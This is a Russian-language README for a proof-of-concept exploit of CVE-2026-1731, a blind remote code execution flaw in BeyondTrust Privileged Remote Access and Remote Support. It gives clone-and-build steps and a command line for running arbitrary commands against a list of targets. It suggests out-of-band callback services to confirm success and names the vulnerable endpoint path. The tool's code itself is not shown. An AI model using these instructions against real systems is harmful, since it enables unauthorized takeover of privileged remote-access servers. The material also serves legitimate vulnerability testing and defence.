
Эксплойт proof-of-concept для CVE-2026-1731, слепое удалённое выполнение кода (blind RCE) в BeyondTrust Privileged Remote Access и Remote Support, позволяющее удалённое выполнение команд на уязвимых версиях.
Для получения дополнительной информации рекомендую ознакомиться с анализом на attackerkb.com.
Для сборки этого PoC вам понадобятся следующие инструменты: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 будет находиться в target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
Вы можете запустить ./CVE-2026-1731 -h, чтобы просмотреть список доступных опций
./CVE-2026-1731 --targets targets.txt --command "whoami"
Примечание: Поскольку CVE-2026-1731 является слепым RCE (blind RCE), от хоста не поступает ответа, который можно было бы использовать в качестве индикатора уязвимости. Запрос может быть успешным, но цель, которая не уязвима, не вызовет RCE. Рекомендуется использовать такие сервисы, как webhook.site или PortSwigger's Burp Collaborator, для тестирования целей. Успех или неудача в этом PoC определяется тем, отвечает ли сервер кодом состояния 200 или нет.
GET /get_rdf?comp=sdcust&locale_code=en-us.